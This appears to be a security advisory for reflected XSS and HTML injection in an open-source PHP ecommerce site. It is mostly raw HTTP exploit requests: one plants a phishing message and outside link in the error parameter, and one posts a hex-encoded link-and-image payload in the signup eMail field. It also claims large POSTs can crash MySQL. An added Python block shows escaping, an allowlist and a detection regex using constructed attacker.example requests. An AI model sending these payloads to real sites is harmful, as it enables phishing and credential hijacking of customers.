## Title: Ecommerce-1.0 XSS-Reflected Hijack-credentials – JavaScript Injection
## Author: nu11secur1ty
## Date: 11.23.2022
## Vendor: https://github.com/winston-dsouza
## Software: https://github.com/winston-dsouza/ecommerce-website
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website
## Description:
The value of the `eMail` request parameter is copied, without encoding, into the value of an HTML tag attribute that is enclosed in double quotation marks.
This system is therefore very simple to attack and can be used by an attacker to trick its users: a very dangerous link can be delivered from any location, and once a customer follows it the game is over for that customer.
By using botnet computers, an attacker could also exploit this vulnerability at scale against a whole network of customers.
## STATUS: HIGH Vulnerability
[+] Exploit00:
```http
POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 0

```
## Description01:
JavaScript can be embedded into an application response, which makes the application vulnerable (signup_script.php: the submit function does no sanitizing).
An attacker could also crash the MySQL server by POSTing large chunks of data, because this system accepts such requests and passes them straight through to the MySQL server.
## STATUS: HIGH Vulnerability (CRITICAL)
## Real attack:
[+] Exploit01:
```http
POST /ecommerce/signup_script.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 1070

eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ
```
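Added example, not code from the advisory or from the ecommerce-website project: a Python sketch of the two sinks described above, the `error` query parameter of index.php and the `eMail` field posted to signup_script.php. It shows the vulnerable attribute reflection beside its escaped form, an allowlisted error banner that never reflects free text, and a request-level check that flags parameters carrying markup or a URL. Every request line, parameter value and hostname in it is constructed, and the `render_unsafe`, `render_safe`, `suspicious_params`, `error_banner` and `handle_signup` names are assumptions, not the project's functions.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed requests (not taken from the advisory) shaped like the two it
# shows: index.php?error=... and the signup_script.php POST body. Request 2
# carries a phishing-style message with a link; request 4 carries an anchor
# tag that closes the double-quoted attribute it is reflected into.
CONSTRUCTED_REQUESTS = [
    ("GET", "/ecommerce/index.php?error=Invalid%20email%20or%20password", ""),
    ("GET", "/ecommerce/index.php?error=Please%20recover%20at%20https%3A%2F%2Fattacker.example", ""),
    ("POST", "/ecommerce/signup_script.php",
     "eMail=alice%40example.com&password=s9L%21c7x%21E2&firstName=Alice&lastName=Doe"),
    ("POST", "/ecommerce/signup_script.php",
     "eMail=%22%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example%2F%22%3Erecover%3C%2Fa%3E"
     "&password=x&firstName=Mallory&lastName=Doe"),
]

# Detection heuristic: neither an error message nor an e-mail address should
# contain angle brackets, a javascript: scheme or an http(s) URL.
HOSTILE_RE = re.compile(r"[<>]|javascript:|https?://", re.IGNORECASE)
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Allowlisted error texts keyed by a short code, so index.php never has to
# reflect free text taken from the query string.
ERROR_MESSAGES = {
    "bad_login": "Invalid email or password.",
    "bad_email": "Please enter a valid email address.",
}


def request_params(method, target, body):
    """Decode query-string and (for POST) form-body parameters into one dict."""
    merged = {}
    sources = [urlsplit(target).query]
    if method == "POST":
        sources.append(body)
    for qs in sources:
        for name, values in parse_qs(qs, keep_blank_values=True).items():
            merged.setdefault(name, values[0])
    return merged


def suspicious_params(params):
    """Names of parameters whose decoded value matches HOSTILE_RE (alert on these)."""
    return sorted(name for name, value in params.items() if HOSTILE_RE.search(value))


def is_valid_email(value):
    return bool(EMAIL_RE.match(value))


def render_unsafe(email):
    """The vulnerable pattern: the raw parameter lands inside a double-quoted attribute."""
    return f'<input type="email" name="eMail" value="{email}">'


def render_safe(email):
    """Hardened form: escape quotes and angle brackets for the attribute context
    (PHP equivalent: htmlspecialchars($email, ENT_QUOTES, 'UTF-8'))."""
    return f'<input type="email" name="eMail" value="{html.escape(email, quote=True)}">'


def error_banner(code):
    """Render an error by allowlisted code instead of reflecting the parameter."""
    text = ERROR_MESSAGES.get(code, "The request could not be completed.")
    return f'<p class="error">{html.escape(text)}</p>'


class _MarkupInspector(HTMLParser):
    """Records the elements a browser would create and the input's value attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def parse_markup(markup):
    """Return (element names in order, value the browser sees for the input)."""
    inspector = _MarkupInspector()
    inspector.feed(markup)
    inspector.close()
    return inspector.tags, inspector.input_value


def handle_signup(params):
    """Validate first, then render with escaping; returns (http_status, markup)."""
    email = params.get("eMail", "")
    if not is_valid_email(email):
        return 400, error_banner("bad_email")
    return 200, render_safe(email)


if __name__ == "__main__":
    for method, target, body in CONSTRUCTED_REQUESTS:
        params = request_params(method, target, body)
        print(method, target.split("?")[0], "flagged:", suspicious_params(params))
    hostile = request_params(*CONSTRUCTED_REQUESTS[3])["eMail"]
    print("unsafe ->", parse_markup(render_unsafe(hostile)))
    print("safe   ->", parse_markup(render_safe(hostile)))
```

The parser check is the point of the block: with the unsafe render the browser builds two elements (`input` and the injected `a`), with the escaped render it builds one and still sees the exact submitted string as the input's value, so escaping loses no data. `suspicious_params` is a coarse triage heuristic for access logs or a WAF rule, not a replacement for output encoding.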
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)
## Evidence and Exploit
[href](https://streamable.com/3r4t36)
## Real Exploit:
[href](https://streamable.com/n3b5ev)
## Real Exploit – code insert:
[href](https://streamable.com/64dmo2)
## Time spent
`1:45`